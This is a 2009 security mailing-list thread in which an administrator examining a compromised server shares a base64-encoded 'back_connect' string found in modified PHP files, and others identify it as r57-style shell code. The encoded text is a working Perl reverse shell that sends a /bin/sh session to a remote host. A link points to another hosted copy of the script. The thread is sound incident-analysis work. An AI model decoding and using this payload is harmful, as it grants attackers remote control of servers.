[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <1234321294.20361.2.camel@Chrome>
Date: Tue, 10 Feb 2009 22:01:34 -0500
From: Justin Rogosky <jrogosky@...il.com>
To: "sr." <staticrez@...il.com>
Cc: Full-Disclosure <full-disclosure@...ts.grok.org.uk>,
pen-test list <pen-test@...urityfocus.com>
Subject: Re: connect back PHP hack
Just as an FYI:
Webscarab and Paros (web application proxies) both have a good Base64
decoder built-in.
This is useful for any sniffed requested using basic authentication as
well.
--Justin
On Tue, 2009-02-10 at 14:34 -0500, sr. wrote:
> i really appreciate all of the responses. this is what community is all about.
>
> i'd seen the "==" in other encoding schemes, but just wasn't sure and
> wanted a quick response...thanks to everyone who responded!
>
> I'll post the rest of my findings on here asap. i'm looking into an
> old compromised machine. this is nothing new..
>
> whoever mentioned the r57 shell, you're probably right as the script
> connects to a remote box @ port 11457. this is r57 behaviour.
>
> i also found a copy of the same script i'm dissecting on someone
> else's box, you can check it out here:
> http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php
>
> in my case, a bunch of php files were modified. i'll zip everything up
> and host it so you can all analyze...
>
> thx,
>
> sr. aka "fabrizio siciliano"
>
>
>
>
>
> On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop@...il.com> wrote:
> > "Sr."
> >
> > This is base64 encoded.
> >
> > 2009/2/10 sr. <staticrez@...il.com>:
> >> can anyone tell me what encoding this is?
> >>
> >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
> >>
> >> this has to do with old php 4.x.x version with magic quotes enabled.
> >> i'm just trying to figure out what the connect back code does.
> >>
> >> any input is much appreciated.
> >>
> >> thx,
> >>
> >> sr.
> >
> > --
> > Saludos,
> > Gustavo Castro Puig.
> > E-Mail: gcastrop@...il.com
> >
> > LPI Level-1 Certified (https://www.lpi.org/es/verify.html
> > LPID:LPI000042304 Verification Code: hp6re8w5qg )
> > -----BEGIN GEEK CODE BLOCK-----
> > Version: 3.12
> > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o?
> > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++
> > D++ G++ e++ h--- r y+++
> > ------END GEEK CODE BLOCK------
> > Registered Linux User #69342
> >
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists